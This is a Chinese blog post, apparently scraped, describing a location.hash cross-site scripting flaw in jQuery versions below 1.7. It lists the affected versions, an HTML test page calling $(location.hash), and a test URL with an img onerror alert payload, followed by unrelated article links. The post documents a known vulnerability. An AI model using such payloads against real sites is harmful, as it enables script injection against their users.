jquery下载地址:https://code.jquery.com/jquery/ 影响范围: 版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCA
来源:互联网 发布:战略要素评价矩阵法 编辑:程序博客网 时间:2024/06/08 14:28
jquery下载地址:https://code.jquery.com/jquery/
影响范围:
版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCATION.HASH跨站漏洞
已测试成功版本:
jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.js
jquery-1.5所有版本
jquery-1.4所有版本
jquery-1.3所有版本
jquery-1.2所有版本
测试:
启动nginx,并建立index.html页面,内容如下:
漏洞发现者给的测试代码:
<html>
<head>
<title>JQuery-xss-test</title>
<script src="https://code.jquery.com/jquery-1.6.1.min.js"></script>
<script>
$(function(){
try { $(location.hash) } catch(e) {}
})
</script>
</head>
<body>
Jquery xss test.
</body>
</html>
访问地址:
http://localhost/#<img src=/ onerror=alert(/F4ckTeam/)>
测试截图:
阅读全文
0 0
- jquery下载地址:https://code.jquery.com/jquery/ 影响范围: 版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCA
- 版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷
- jquery的版本所导致的结果是不一样的
- 使用jquery可能存在的9个误区
- JQuery 插件的下载地址
- jquery正则表达式的应用
- jQuery常用的正则表达式
- jQuery常用的正则表达式
- jQuery常用的正则表达式
- jQuery 的正则表达式验证
- jQuery 过滤选择器的使用
- jQuery过滤选择器的使用
- jquery 各版本下载地址
- 用javascript+jquery+正则表达式实现用户输入验证
- Jquery版本问题导致的相关问题
- jQuery的过滤选择器
- Jquery的过滤选择器
- jquery的过滤选择器
- 初学JAVA01
- 记录平台改造中的问题及解决方法
- 动态/静态语言及强类型/弱类型语言简析
- 关于 cvx & spams 的两个版本的安装、测试
- DIV+CSS(网页遮罩效果)
- jquery下载地址:https://code.jquery.com/jquery/ 影响范围: 版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCA
- SQLLDR 简介
- newInstance()和new()的区别
- 【队内练习赛】OMG爱吃鸡 【dp递推】【思维题】【好题】
- hihocoder #1014 : Trie树
- qt中的lineEdit文本输入框的输入类型限制(三种验证类)
- 说说JSON和JSONP
- c# splitContainer控件
- 常用正则表达式大全!(例如:匹配中文、匹配html)